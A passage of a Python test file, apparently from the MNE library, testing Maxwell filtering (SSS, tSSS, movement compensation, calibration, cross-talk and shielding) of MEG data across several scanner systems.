raw_sss_mv = maxwell_filter(raw_nohpi, head_pos=head_pos,
st_duration=4., origin=mf_head_origin,
st_fixed=False)
assert_equal(len(w), 1)
assert_true('is untested' in str(w[0].message))
# Neither match is particularly good because our algorithm actually differs
assert_meg_snr(raw_sss_mv, Raw(sss_movecomp_reg_in_st4s_fname).crop(*lims),
0.6, 1.3)
tSSS_fname = op.join(sss_path, 'test_move_anon_st4s_raw_sss.fif')
assert_meg_snr(raw_sss_mv, Raw(tSSS_fname).crop(*lims),
0.6, 1.0, chpi_med_tol=None)
assert_meg_snr(Raw(sss_movecomp_reg_in_st4s_fname), Raw(tSSS_fname),
0.8, 1.0, chpi_med_tol=None)
#
# Movement compensation, regularization, tSSS at the beginning
#
raw_sss_mc = maxwell_filter(raw_nohpi, head_pos=head_pos, st_duration=4.,
origin=mf_head_origin)
assert_meg_snr(raw_sss_mc, Raw(tSSS_fname).crop(*lims),
0.6, 1.0, chpi_med_tol=None)
assert_meg_snr(raw_sss_mc, raw_sss_mv, 0.6, 1.4)
# some degenerate cases
raw_erm = Raw(erm_fname, allow_maxshield='yes')
assert_raises(ValueError, maxwell_filter, raw_erm, coord_frame='meg',
head_pos=head_pos) # can't do ERM file
assert_raises(ValueError, maxwell_filter, raw,
head_pos=head_pos[:, :9]) # bad shape
assert_raises(TypeError, maxwell_filter, raw, head_pos='foo') # bad type
assert_raises(ValueError, maxwell_filter, raw, head_pos=head_pos[::-1])
head_pos_bad = head_pos.copy()
head_pos_bad[0, 0] = raw.first_samp / raw.info['sfreq'] - 1e-2
assert_raises(ValueError, maxwell_filter, raw, head_pos=head_pos_bad)
# make sure numerical error doesn't screw it up, though
head_pos_bad[0, 0] = raw.first_samp / raw.info['sfreq'] - 5e-4
raw_sss_tweak = maxwell_filter(raw, head_pos=head_pos_bad,
origin=mf_head_origin)
assert_meg_snr(raw_sss_tweak, raw_sss, 2., 10., chpi_med_tol=11)
@slow_test
def test_other_systems():
"""Test Maxwell filtering on KIT, BTI, and CTF files
"""
# KIT
kit_dir = op.join(io_dir, 'kit', 'tests', 'data')
sqd_path = op.join(kit_dir, 'test.sqd')
mrk_path = op.join(kit_dir, 'test_mrk.sqd')
elp_path = op.join(kit_dir, 'test_elp.txt')
hsp_path = op.join(kit_dir, 'test_hsp.txt')
raw_kit = read_raw_kit(sqd_path, mrk_path, elp_path, hsp_path)
with warnings.catch_warnings(record=True): # head fit
assert_raises(RuntimeError, maxwell_filter, raw_kit)
raw_sss = maxwell_filter(raw_kit, origin=(0., 0., 0.04), ignore_ref=True)
_assert_n_free(raw_sss, 65, 65)
# XXX this KIT origin fit is terrible! Eventually we should get a
# corrected HSP file with proper coverage
with warnings.catch_warnings(record=True):
with catch_logging() as log_file:
assert_raises(RuntimeError, maxwell_filter, raw_kit,
ignore_ref=True, regularize=None) # bad condition
raw_sss = maxwell_filter(raw_kit, origin='auto',
ignore_ref=True, bad_condition='warning',
verbose='warning')
log_file = log_file.getvalue()
assert_true('badly conditioned' in log_file)
assert_true('more than 20 mm from' in log_file)
# fits can differ slightly based on scipy version, so be lenient here
_assert_n_free(raw_sss, 28, 34) # bad origin == brutal reg
# Let's set the origin
with warnings.catch_warnings(record=True):
with catch_logging() as log_file:
raw_sss = maxwell_filter(raw_kit, origin=(0., 0., 0.04),
ignore_ref=True, bad_condition='warning',
regularize=None, verbose='warning')
log_file = log_file.getvalue()
assert_true('badly conditioned' in log_file)
_assert_n_free(raw_sss, 80)
# Now with reg
with warnings.catch_warnings(record=True):
with catch_logging() as log_file:
raw_sss = maxwell_filter(raw_kit, origin=(0., 0., 0.04),
ignore_ref=True, verbose=True)
log_file = log_file.getvalue()
assert_true('badly conditioned' not in log_file)
_assert_n_free(raw_sss, 65)
# BTi
bti_dir = op.join(io_dir, 'bti', 'tests', 'data')
bti_pdf = op.join(bti_dir, 'test_pdf_linux')
bti_config = op.join(bti_dir, 'test_config_linux')
bti_hs = op.join(bti_dir, 'test_hs_linux')
with warnings.catch_warnings(record=True): # weight table
raw_bti = read_raw_bti(bti_pdf, bti_config, bti_hs, preload=False)
raw_sss = maxwell_filter(raw_bti)
_assert_n_free(raw_sss, 70)
# CTF
raw_ctf = Raw(fname_ctf_raw, compensation=2)
assert_raises(RuntimeError, maxwell_filter, raw_ctf) # compensated
raw_ctf = Raw(fname_ctf_raw)
assert_raises(ValueError, maxwell_filter, raw_ctf) # cannot fit headshape
raw_sss = maxwell_filter(raw_ctf, origin=(0., 0., 0.04))
_assert_n_free(raw_sss, 68)
raw_sss = maxwell_filter(raw_ctf, origin=(0., 0., 0.04), ignore_ref=True)
_assert_n_free(raw_sss, 70)
def test_spherical_harmonics():
"""Test spherical harmonic functions"""
from scipy.special import sph_harm
az, pol = np.meshgrid(np.linspace(0, 2 * np.pi, 30),
np.linspace(0, np.pi, 20))
# As of Oct 16, 2015, Anaconda has a bug in scipy due to old compilers (?):
# https://github.com/ContinuumIO/anaconda-issues/issues/479
if (PY3 and
LooseVersion(scipy.__version__) >= LooseVersion('0.15') and
'Continuum Analytics' in sys.version):
raise SkipTest('scipy sph_harm bad in Py3k on Anaconda')
# Test our basic spherical harmonics
for degree in range(1, int_order):
for order in range(0, degree + 1):
sph = _sph_harm(order, degree, az, pol)
sph_scipy = sph_harm(order, degree, az, pol)
assert_allclose(sph, sph_scipy, atol=1e-7)
def test_spherical_conversions():
"""Test spherical harmonic conversions"""
# Test our real<->complex conversion functions
az, pol = np.meshgrid(np.linspace(0, 2 * np.pi, 30),
np.linspace(0, np.pi, 20))
for degree in range(1, int_order):
for order in range(0, degree + 1):
sph = _sph_harm(order, degree, az, pol)
# ensure that we satisfy the conjugation property
assert_allclose(_sh_negate(sph, order),
_sph_harm(-order, degree, az, pol))
# ensure our conversion functions work
sph_real_pos = _sh_complex_to_real(sph, order)
sph_real_neg = _sh_complex_to_real(sph, -order)
sph_2 = _sh_real_to_complex([sph_real_pos, sph_real_neg], order)
assert_allclose(sph, sph_2, atol=1e-7)
@testing.requires_testing_data
def test_multipolar_bases():
"""Test multipolar moment basis calculation using sensor information"""
from scipy.io import loadmat
# Test our basis calculations
info = read_info(raw_fname)
coils = _prep_meg_channels(info, accurate=True, elekta_defs=True,
do_es=True)[0]
# Check against a known benchmark
sss_data = loadmat(bases_fname)
exp = dict(int_order=int_order, ext_order=ext_order)
for origin in ((0, 0, 0.04), (0, 0.02, 0.02)):
o_str = ''.join('%d' % (1000 * n) for n in origin)
exp.update(origin=origin)
S_tot = _sss_basis_basic(exp, coils, method='alternative')
# Test our real<->complex conversion functions
S_tot_complex = _bases_real_to_complex(S_tot, int_order, ext_order)
S_tot_round = _bases_complex_to_real(S_tot_complex,
int_order, ext_order)
assert_allclose(S_tot, S_tot_round, atol=1e-7)
S_tot_mat = np.concatenate([sss_data['Sin' + o_str],
sss_data['Sout' + o_str]], axis=1)
S_tot_mat_real = _bases_complex_to_real(S_tot_mat,
int_order, ext_order)
S_tot_mat_round = _bases_real_to_complex(S_tot_mat_real,
int_order, ext_order)
assert_allclose(S_tot_mat, S_tot_mat_round, atol=1e-7)
assert_allclose(S_tot_complex, S_tot_mat, rtol=1e-4, atol=1e-8)
assert_allclose(S_tot, S_tot_mat_real, rtol=1e-4, atol=1e-8)
# Now normalize our columns
S_tot /= np.sqrt(np.sum(S_tot * S_tot, axis=0))[np.newaxis]
S_tot_complex /= np.sqrt(np.sum(
(S_tot_complex * S_tot_complex.conj()).real, axis=0))[np.newaxis]
# Check against a known benchmark
S_tot_mat = np.concatenate([sss_data['SNin' + o_str],
sss_data['SNout' + o_str]], axis=1)
# Check this roundtrip
S_tot_mat_real = _bases_complex_to_real(S_tot_mat,
int_order, ext_order)
S_tot_mat_round = _bases_real_to_complex(S_tot_mat_real,
int_order, ext_order)
assert_allclose(S_tot_mat, S_tot_mat_round, atol=1e-7)
assert_allclose(S_tot_complex, S_tot_mat, rtol=1e-4, atol=1e-8)
# Now test our optimized version
S_tot = _sss_basis_basic(exp, coils)
S_tot_fast = _trans_sss_basis(
exp, all_coils=_prep_mf_coils(info), trans=info['dev_head_t'])
# there are some sign differences for columns (order/degrees)
# in here, likely due to Condon-Shortley. Here we use a
# Magnetometer channel to figure out the flips because the
# gradiometer channels have effectively zero values for first three
# external components (i.e., S_tot[grad_picks, 80:83])
flips = (np.sign(S_tot_fast[2]) != np.sign(S_tot[2]))
flips = 1 - 2 * flips
assert_allclose(S_tot, S_tot_fast * flips, atol=1e-16)
@testing.requires_testing_data
def test_basic():
"""Test Maxwell filter basic version"""
# Load testing data (raw, SSS std origin, SSS non-standard origin)
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1., copy=False)
raw_err = Raw(raw_fname, proj=True, allow_maxshield='yes')
raw_erm = Raw(erm_fname, allow_maxshield='yes')
assert_raises(RuntimeError, maxwell_filter, raw_err)
assert_raises(TypeError, maxwell_filter, 1.) # not a raw
assert_raises(ValueError, maxwell_filter, raw, int_order=20) # too many
n_int_bases = int_order ** 2 + 2 * int_order
n_ext_bases = ext_order ** 2 + 2 * ext_order
nbases = n_int_bases + n_ext_bases
# Check number of bases computed correctly
assert_equal(_get_n_moments([int_order, ext_order]).sum(), nbases)
# Test SSS computation at the standard head origin
assert_equal(len(raw.info['projs']), 12) # 11 MEG projs + 1 AVG EEG
raw_sss = maxwell_filter(raw, origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_equal(len(raw_sss.info['projs']), 1) # avg EEG
assert_equal(raw_sss.info['projs'][0]['desc'], 'Average EEG reference')
assert_meg_snr(raw_sss, Raw(sss_std_fname), 200., 1000.)
py_cal = raw_sss.info['proc_history'][0]['max_info']['sss_cal']
assert_equal(len(py_cal), 0)
py_ctc = raw_sss.info['proc_history'][0]['max_info']['sss_ctc']
assert_equal(len(py_ctc), 0)
py_st = raw_sss.info['proc_history'][0]['max_info']['max_st']
assert_equal(len(py_st), 0)
assert_raises(RuntimeError, maxwell_filter, raw_sss)
# Test SSS computation at non-standard head origin
raw_sss = maxwell_filter(raw, origin=[0., 0.02, 0.02], regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, Raw(sss_nonstd_fname), 250., 700.)
# Test SSS computation at device origin
sss_erm_std = Raw(sss_erm_std_fname)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg',
origin=mf_meg_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, sss_erm_std, 100., 900.)
for key in ('job', 'frame'):
vals = [x.info['proc_history'][0]['max_info']['sss_info'][key]
for x in [raw_sss, sss_erm_std]]
assert_equal(vals[0], vals[1])
# Check against SSS functions from proc_history
sss_info = raw_sss.info['proc_history'][0]['max_info']
assert_equal(_get_n_moments(int_order),
proc_history._get_sss_rank(sss_info))
# Degenerate cases
raw_bad = raw.copy()
raw_bad.comp = True
assert_raises(RuntimeError, maxwell_filter, raw_bad)
del raw_bad
assert_raises(ValueError, maxwell_filter, raw, coord_frame='foo')
assert_raises(ValueError, maxwell_filter, raw, origin='foo')
assert_raises(ValueError, maxwell_filter, raw, origin=[0] * 4)
@testing.requires_testing_data
def test_maxwell_filter_additional():
"""Test processing of Maxwell filtered data"""
# TODO: Future tests integrate with mne/io/tests/test_proc_history
# Load testing data (raw, SSS std origin, SSS non-standard origin)
data_path = op.join(testing.data_path(download=False))
file_name = 'test_move_anon'
raw_fname = op.join(data_path, 'SSS', file_name + '_raw.fif')
# Use 2.0 seconds of data to get stable cov. estimate
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 2., copy=False)
# Get MEG channels, compute Maxwell filtered data
raw.load_data()
raw.pick_types(meg=True, eeg=False)
int_order = 8
raw_sss = maxwell_filter(raw, origin=mf_head_origin, regularize=None,
bad_condition='ignore')
# Test io on processed data
tempdir = _TempDir()
test_outname = op.join(tempdir, 'test_raw_sss.fif')
raw_sss.save(test_outname)
raw_sss_loaded = Raw(test_outname, preload=True)
# Some numerical imprecision since save uses 'single' fmt
assert_allclose(raw_sss_loaded[:][0], raw_sss[:][0],
rtol=1e-6, atol=1e-20)
# Test rank of covariance matrices for raw and SSS processed data
cov_raw = compute_raw_covariance(raw)
cov_sss = compute_raw_covariance(raw_sss)
scalings = None
cov_raw_rank = _estimate_rank_meeg_cov(cov_raw['data'], raw.info, scalings)
cov_sss_rank = _estimate_rank_meeg_cov(cov_sss['data'], raw_sss.info,
scalings)
assert_equal(cov_raw_rank, raw.info['nchan'])
assert_equal(cov_sss_rank, _get_n_moments(int_order))
@slow_test
@testing.requires_testing_data
def test_bads_reconstruction():
"""Test Maxwell filter reconstruction of bad channels"""
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1.)
raw.info['bads'] = bads
raw_sss = maxwell_filter(raw, origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, Raw(sss_bad_recon_fname), 300.)
@requires_svd_convergence
@testing.requires_testing_data
def test_spatiotemporal_maxwell():
"""Test Maxwell filter (tSSS) spatiotemporal processing"""
# Load raw testing data
raw = Raw(raw_fname, allow_maxshield='yes')
# Test that window is less than length of data
assert_raises(ValueError, maxwell_filter, raw, st_duration=1000.)
# Check both 4 and 10 seconds because Elekta handles them differently
# This is to ensure that std/non-std tSSS windows are correctly handled
st_durations = [4., 10.]
tols = [325., 200.]
for st_duration, tol in zip(st_durations, tols):
# Load tSSS data depending on st_duration and get data
tSSS_fname = op.join(sss_path,
'test_move_anon_st%0ds_raw_sss.fif' % st_duration)
tsss_bench = Raw(tSSS_fname)
# Because Elekta's tSSS sometimes(!) lumps the tail window of data
# onto the previous buffer if it's shorter than st_duration, we have to
# crop the data here to compensate for Elekta's tSSS behavior.
if st_duration == 10.:
tsss_bench.crop(0, st_duration, copy=False)
# Test sss computation at the standard head origin. Same cropping issue
# as mentioned above.
if st_duration == 10.:
raw_tsss = maxwell_filter(raw.crop(0, st_duration),
origin=mf_head_origin,
st_duration=st_duration, regularize=None,
bad_condition='ignore')
else:
raw_tsss = maxwell_filter(raw, st_duration=st_duration,
origin=mf_head_origin, regularize=None,
bad_condition='ignore', verbose=True)
raw_tsss_2 = maxwell_filter(raw, st_duration=st_duration,
origin=mf_head_origin, regularize=None,
bad_condition='ignore', st_fixed=False,
verbose=True)
assert_meg_snr(raw_tsss, raw_tsss_2, 100., 1000.)
assert_equal(raw_tsss.estimate_rank(), 140)
assert_equal(raw_tsss_2.estimate_rank(), 140)
assert_meg_snr(raw_tsss, tsss_bench, tol)
py_st = raw_tsss.info['proc_history'][0]['max_info']['max_st']
assert_true(len(py_st) > 0)
assert_equal(py_st['buflen'], st_duration)
assert_equal(py_st['subspcorr'], 0.98)
# Degenerate cases
assert_raises(ValueError, maxwell_filter, raw, st_duration=10.,
st_correlation=0.)
@requires_svd_convergence
@testing.requires_testing_data
def test_spatiotemporal_only():
"""Test tSSS-only processing"""
# Load raw testing data
raw = Raw(raw_fname,
allow_maxshield='yes').crop(0, 2, copy=False).load_data()
picks = pick_types(raw.info, meg='mag', exclude=())
power = np.sqrt(np.sum(raw[picks][0] ** 2))
# basics
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True)
assert_equal(raw_tsss.estimate_rank(), 366)
_assert_shielding(raw_tsss, power, 10)
# temporal proj will actually reduce spatial DOF with small windows!
raw_tsss = maxwell_filter(raw, st_duration=0.1, st_only=True)
assert_true(raw_tsss.estimate_rank() < 350)
_assert_shielding(raw_tsss, power, 40)
# with movement
head_pos = read_head_pos(pos_fname)
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True,
head_pos=head_pos)
assert_equal(raw_tsss.estimate_rank(), 366)
_assert_shielding(raw_tsss, power, 12)
with warnings.catch_warnings(record=True): # st_fixed False
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True,
head_pos=head_pos, st_fixed=False)
assert_equal(raw_tsss.estimate_rank(), 366)
_assert_shielding(raw_tsss, power, 12)
# should do nothing
raw_tsss = maxwell_filter(raw, st_duration=1., st_correlation=1.,
st_only=True)
assert_allclose(raw[:][0], raw_tsss[:][0])
# degenerate
assert_raises(ValueError, maxwell_filter, raw, st_only=True) # no ST
# two-step process equivalent to single-step process
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True)
raw_tsss = maxwell_filter(raw_tsss)
raw_tsss_2 = maxwell_filter(raw, st_duration=1.)
assert_meg_snr(raw_tsss, raw_tsss_2, 1e5)
# now also with head movement, and a bad MEG channel
assert_equal(len(raw.info['bads']), 0)
raw.info['bads'] = ['EEG001', 'MEG2623']
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True,
head_pos=head_pos)
assert_equal(raw.info['bads'], ['EEG001', 'MEG2623'])
assert_equal(raw_tsss.info['bads'], ['EEG001', 'MEG2623']) # don't reset
raw_tsss = maxwell_filter(raw_tsss, head_pos=head_pos)
assert_equal(raw_tsss.info['bads'], ['EEG001']) # do reset MEG bads
raw_tsss_2 = maxwell_filter(raw, st_duration=1., head_pos=head_pos)
assert_equal(raw_tsss_2.info['bads'], ['EEG001'])
assert_meg_snr(raw_tsss, raw_tsss_2, 1e5)
@testing.requires_testing_data
def test_fine_calibration():
"""Test Maxwell filter fine calibration"""
# Load testing data (raw, SSS std origin, SSS non-standard origin)
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1., copy=False)
sss_fine_cal = Raw(sss_fine_cal_fname)
# Test 1D SSS fine calibration
raw_sss = maxwell_filter(raw, calibration=fine_cal_fname,
origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, sss_fine_cal, 82, 611)
py_cal = raw_sss.info['proc_history'][0]['max_info']['sss_cal']
assert_true(py_cal is not None)
assert_true(len(py_cal) > 0)
mf_cal = sss_fine_cal.info['proc_history'][0]['max_info']['sss_cal']
# we identify these differently
mf_cal['cal_chans'][mf_cal['cal_chans'][:, 1] == 3022, 1] = 3024
assert_allclose(py_cal['cal_chans'], mf_cal['cal_chans'])
assert_allclose(py_cal['cal_corrs'], mf_cal['cal_corrs'],
rtol=1e-3, atol=1e-3)
# Test 3D SSS fine calibration (no equivalent func in MaxFilter yet!)
# very low SNR as proc differs, eventually we should add a better test
raw_sss_3D = maxwell_filter(raw, calibration=fine_cal_fname_3d,
origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss_3D, sss_fine_cal, 1.0, 6.)
raw_ctf = Raw(fname_ctf_raw)
assert_raises(RuntimeError, maxwell_filter, raw_ctf, origin=(0., 0., 0.04),
calibration=fine_cal_fname)
@slow_test
@testing.requires_testing_data
def test_regularization():
"""Test Maxwell filter regularization"""
# Load testing data (raw, SSS std origin, SSS non-standard origin)
min_tols = (100., 2.6, 1.0)
med_tols = (1000., 21.4, 3.7)
origins = ((0., 0., 0.04), (0.,) * 3, (0., 0.02, 0.02))
coord_frames = ('head', 'meg', 'head')
raw_fnames = (raw_fname, erm_fname, sample_fname)
sss_fnames = (sss_reg_in_fname, sss_erm_reg_in_fname,
sss_samp_reg_in_fname)
comp_tols = [0, 1, 4]
for ii, rf in enumerate(raw_fnames):
raw = Raw(rf, allow_maxshield='yes').crop(0., 1.)
sss_reg_in = Raw(sss_fnames[ii])
# Test "in" regularization
raw_sss = maxwell_filter(raw, coord_frame=coord_frames[ii],
origin=origins[ii])
assert_meg_snr(raw_sss, sss_reg_in, min_tols[ii], med_tols[ii], msg=rf)
# check components match
_check_reg_match(raw_sss, sss_reg_in, comp_tols[ii])
def _check_reg_match(sss_py, sss_mf, comp_tol):
"""Helper to check regularization"""
info_py = sss_py.info['proc_history'][0]['max_info']['sss_info']
assert_true(info_py is not None)
assert_true(len(info_py) > 0)
info_mf = sss_mf.info['proc_history'][0]['max_info']['sss_info']
n_in = None
for inf in (info_py, info_mf):
if n_in is None:
n_in = _get_n_moments(inf['in_order'])
else:
assert_equal(n_in, _get_n_moments(inf['in_order']))
assert_equal(inf['components'][:n_in].sum(), inf['nfree'])
assert_allclose(info_py['nfree'], info_mf['nfree'],
atol=comp_tol, err_msg=sss_py._filenames[0])
@testing.requires_testing_data
def test_cross_talk():
"""Test Maxwell filter cross-talk cancellation"""
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1., copy=False)
raw.info['bads'] = bads
sss_ctc = Raw(sss_ctc_fname)
raw_sss = maxwell_filter(raw, cross_talk=ctc_fname,
origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, sss_ctc, 275.)
py_ctc = raw_sss.info['proc_history'][0]['max_info']['sss_ctc']
assert_true(len(py_ctc) > 0)
assert_raises(ValueError, maxwell_filter, raw, cross_talk=raw)
assert_raises(ValueError, maxwell_filter, raw, cross_talk=raw_fname)
mf_ctc = sss_ctc.info['proc_history'][0]['max_info']['sss_ctc']
del mf_ctc['block_id'] # we don't write this
assert_equal(object_diff(py_ctc, mf_ctc), '')
raw_ctf = Raw(fname_ctf_raw)
assert_raises(ValueError, maxwell_filter, raw_ctf) # cannot fit headshape
raw_sss = maxwell_filter(raw_ctf, origin=(0., 0., 0.04))
_assert_n_free(raw_sss, 68)
raw_sss = maxwell_filter(raw_ctf, origin=(0., 0., 0.04), ignore_ref=True)
_assert_n_free(raw_sss, 70)
raw_missing = raw.copy().crop(0, 0.1).load_data().pick_channels(
[raw.ch_names[pi] for pi in pick_types(raw.info, meg=True,
exclude=())[3:]])
with warnings.catch_warnings(record=True) as w:
maxwell_filter(raw_missing, cross_talk=ctc_fname)
assert_equal(len(w), 1)
assert_true('Not all cross-talk channels in raw' in str(w[0].message))
# MEG channels not in cross-talk
assert_raises(RuntimeError, maxwell_filter, raw_ctf, origin=(0., 0., 0.04),
cross_talk=ctc_fname)
@testing.requires_testing_data
def test_head_translation():
"""Test Maxwell filter head translation"""
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1., copy=False)
# First try with an unchanged destination
raw_sss = maxwell_filter(raw, destination=raw_fname,
origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, Raw(sss_std_fname).crop(0., 1.), 200.)
# Now with default
with warnings.catch_warnings(record=True):
with catch_logging() as log:
raw_sss = maxwell_filter(raw, destination=mf_head_origin,
origin=mf_head_origin, regularize=None,
bad_condition='ignore', verbose='warning')
assert_true('over 25 mm' in log.getvalue())
assert_meg_snr(raw_sss, Raw(sss_trans_default_fname), 125.)
destination = np.eye(4)
destination[2, 3] = 0.04
assert_allclose(raw_sss.info['dev_head_t']['trans'], destination)
# Now to sample's head pos
with warnings.catch_warnings(record=True):
with catch_logging() as log:
raw_sss = maxwell_filter(raw, destination=sample_fname,
origin=mf_head_origin, regularize=None,
bad_condition='ignore', verbose='warning')
assert_true('= 25.6 mm' in log.getvalue())
assert_meg_snr(raw_sss, Raw(sss_trans_sample_fname), 350.)
assert_allclose(raw_sss.info['dev_head_t']['trans'],
read_info(sample_fname)['dev_head_t']['trans'])
# Degenerate cases
assert_raises(RuntimeError, maxwell_filter, raw,
destination=mf_head_origin, coord_frame='meg')
assert_raises(ValueError, maxwell_filter, raw, destination=[0.] * 4)
# TODO: Eventually add simulation tests mirroring Taulu's original paper
# that calculates the localization error:
# http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=1495874
def _assert_shielding(raw_sss, erm_power, shielding_factor, meg='mag'):
"""Helper to assert a minimum shielding factor using empty-room power"""
picks = pick_types(raw_sss.info, meg=meg)
sss_power = raw_sss[picks][0].ravel()
sss_power = np.sqrt(np.sum(sss_power * sss_power))
factor = erm_power / sss_power
assert_true(factor >= shielding_factor,
'Shielding factor %0.3f < %0.3f' % (factor, shielding_factor))
@slow_test
@requires_svd_convergence
@testing.requires_testing_data
def test_shielding_factor():
"""Test Maxwell filter shielding factor using empty room"""
raw_erm = Raw(erm_fname, allow_maxshield='yes', preload=True)
picks = pick_types(raw_erm.info, meg='mag')
erm_power = raw_erm[picks][0]
erm_power = np.sqrt(np.sum(erm_power * erm_power))
# Vanilla SSS (second value would be for meg=True instead of meg='mag')
_assert_shielding(Raw(sss_erm_std_fname), erm_power, 10) # 1.5)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None)
_assert_shielding(raw_sss, erm_power, 12) # 1.5)
# Fine cal
_assert_shielding(Raw(sss_erm_fine_cal_fname), erm_power, 12) # 2.0)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
origin=mf_meg_origin,
calibration=fine_cal_fname)
_assert_shielding(raw_sss, erm_power, 12) # 2.0)
# Crosstalk
_assert_shielding(Raw(sss_erm_ctc_fname), erm_power, 12) # 2.1)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
origin=mf_meg_origin,
cross_talk=ctc_fname)
_assert_shielding(raw_sss, erm_power, 12) # 2.1)
# Fine cal + Crosstalk
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
calibration=fine_cal_fname,
origin=mf_meg_origin,
cross_talk=ctc_fname)
_assert_shielding(raw_sss, erm_power, 13) # 2.2)
# tSSS
_assert_shielding(Raw(sss_erm_st_fname), erm_power, 37) # 5.8)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
origin=mf_meg_origin, st_duration=1.)
_assert_shielding(raw_sss, erm_power, 37) # 5.8)
# Crosstalk + tSSS
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
cross_talk=ctc_fname, origin=mf_meg_origin,
st_duration=1.)
_assert_shielding(raw_sss, erm_power, 38) # 5.91)
# Fine cal + tSSS
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
calibration=fine_cal_fname,
origin=mf_meg_origin, st_duration=1.)
_assert_shielding(raw_sss, erm_power, 38) # 5.98)
# Fine cal + Crosstalk + tSSS
_assert_shielding(Raw(sss_erm_st1FineCalCrossTalk_fname),
erm_power, 39) # 6.07)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
calibration=fine_cal_fname, origin=mf_meg_origin,
cross_talk=ctc_fname, st_duration=1.)
_assert_shielding(raw_sss, erm_power, 39) # 6.05)
# Fine cal + Crosstalk + tSSS + Reg-in
_assert_shielding(Raw(sss_erm_st1FineCalCrossTalkRegIn_fname), erm_power,
57) # 6.97)
raw_sss = maxwell_filter(raw_erm, calibration=fine_cal_fname,
cross_talk=ctc_fname, st_duration=1.,
origin=mf_meg_origin,
coord_frame='meg', regularize='in')
_assert_shielding(raw_sss, erm_power, 53) # 6.64)
raw_sss = maxwell_filter(raw_erm, calibration=fine_cal_fname,
cross_talk=ctc_fname, st_duration=1.,
coord_frame='meg', regularize='in')
_assert_shielding(raw_sss, erm_power, 58) # 7.0)
raw_sss = maxwell_filter(raw_erm, calibration=fine_cal_fname_3d,
cross_talk=ctc_fname, st_duration=1.,
coord_frame='meg', regularize='in')
# Our 3D cal has worse defaults for this ERM than the 1D file
_assert_shielding(raw_sss, erm_power, 54)
# Show it by rewriting the 3D as 1D and testing it
temp_dir = _TempDir()
temp_fname = op.join(temp_dir, 'test_cal.dat')
with open(fine_cal_fname_3d, 'r') as fid:
with open(temp_fname, 'w') as fid_out:
for line in fid:
fid_out.write(' '.join(line.strip().split(' ')[:14]) + '\n')
raw_sss = maxwell_filter(raw_erm, calibration=temp_fname,
cross_talk=ctc_fname, st_duration=1.,
coord_frame='meg', regularize='in')
# Our 3D cal has worse defaults for this ERM than the 1D file
_assert_shielding(raw_sss, erm_power, 44)
@slow_test
@requires_svd_convergence
@testing.requires_testing_data
def test_all():
"""Test maxwell filter using all options"""
raw_fnames = (raw_fname, raw_fname, erm_fname, sample_fname)
sss_fnames = (sss_st1FineCalCrossTalkRegIn_fname,
sss_st1FineCalCrossTalkRegInTransSample_fname,
sss_erm_st1FineCalCrossTalkRegIn_fname,
sss_samp_fname)
fine_cals = (fine_cal_fname,
fine_cal_fname,
fine_cal_fname,
fine_cal_mgh_fname)
coord_frames = ('head', 'head', 'meg', 'head')
ctcs = (ctc_fname, ctc_fname, ctc_fname, ctc_mgh_fname)
mins = (3.5, 3.5, 1.2, 0.9)
meds = (10.8, 10.4, 3.2, 6.)
st_durs = (1., 1., 1., None)
destinations = (None, sample_fname, None, None)
origins = (mf_head_origin,
mf_head_origin,
mf_meg_origin,
mf_head_origin)
for ii, rf in enumerate(raw_fnames):
raw = Raw(rf, allow_maxshield='yes').crop(0., 1.)
with warnings.catch_warnings(record=True): # head fit off-center
sss_py = maxwell_filter(
raw, calibration=fine_cals[ii], cross_talk=ctcs[ii],
st_duration=st_durs[ii], coord_frame=coord_frames[ii],
destination=destinations[ii], origin=origins[ii])
sss_mf = Raw(sss_fnames[ii])
assert_meg_snr(sss_py, sss_mf, mins[ii], meds[ii], msg=rf)
@slow_test
@requires_svd_convergence
@testing.requires_testing_data
def test_triux():
"""Test TRIUX system support"""
raw = Raw(tri_fname).crop(0, 0.999)
raw.fix_mag_coil_types()
# standard
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None)
assert_meg_snr(sss_py, Raw(tri_sss_fname), 37, 700)
# cross-talk
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None,
cross_talk=tri_ctc_fname)
assert_meg_snr(sss_py, Raw(tri_sss_ctc_fname), 35, 700)
# fine cal
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None,
calibration=tri_cal_fname)
assert_meg_snr(sss_py, Raw(tri_sss_cal_fname), 31, 360)
# ctc+cal
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None,
calibration=tri_cal_fname,
cross_talk=tri_ctc_fname)
assert_meg_snr(sss_py, Raw(tri_sss_ctc_cal_fname), 31, 350)
# regularization
sss_py = maxwell_filter(raw, coord_frame='meg', regularize='in')
sss_mf = Raw(tri_sss_reg_fname)
assert_meg_snr(sss_py, sss_mf, 0.6, 9)
